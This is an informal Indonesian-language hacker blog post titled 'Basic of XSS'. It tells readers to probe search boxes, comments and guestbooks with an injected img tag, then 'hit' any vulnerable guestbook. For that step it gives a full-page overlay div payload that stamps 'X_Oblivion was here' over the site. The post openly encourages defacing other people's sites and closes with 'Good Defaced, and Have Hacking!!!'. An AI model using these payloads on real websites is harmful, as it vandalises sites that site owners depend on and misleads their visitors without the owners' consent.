Basic of XSS

Basic of XSS. beberapa orang bilang kalo XSS itu gak pentink dan gak berbahaya...
Caranya biar berbahaya lupa nih caranya... ^_^
Pengertian XSS kira-kira menurut saya begini: ehem... ehem.... Suatu bug situs yang terjadi karena kesalahan coding, dan menjadi bisa mengeksekusi HTML Code, dan JavaScript, dll.

Jika anda memasukkan XSS ke search engine gak bakal berlangsung lama dan cuma kita doank yang bisa liat, kalo di Guestbook, Comment, dll. bisa bersifat permanen, karena isi Guestbook, Comment langsung masuk ke database...

Emank kalo kita menggunakannya dengan bijak script yang ganas, maka XSS sangat berguna...
Langsung ke caranya deh...

CARA NGETEST BUG XSS ADA APA NGGAK:
- Masukkan code ini ke search engine, comment, guestbook:

<img src="url gambar" />


Kalo keluar gambar anda, berarti ada Bug XSS-nya!!!
Kalo ada di guestbook, LANGSUNG HAJAR!!! Let Deface it!!!

Masukin kode ini:

<div style="background: rgb(0, 0, 0) none repeat scroll 0% 0%; width: 1280px; height: 5800px; position: absolute; left: 0pt; top: 0pt; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; z-index: 1000;" align="center"><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><span style="font-size:7;color:00ff00;">X_Oblivion was here... >> </span><br /><br /><br /><br /><br /><br /></div>


Xixixixixi......... kita bangkitkan semangat newbie!!!

Dah dulu yaa...
Good Defaced, and Have Hacking!!!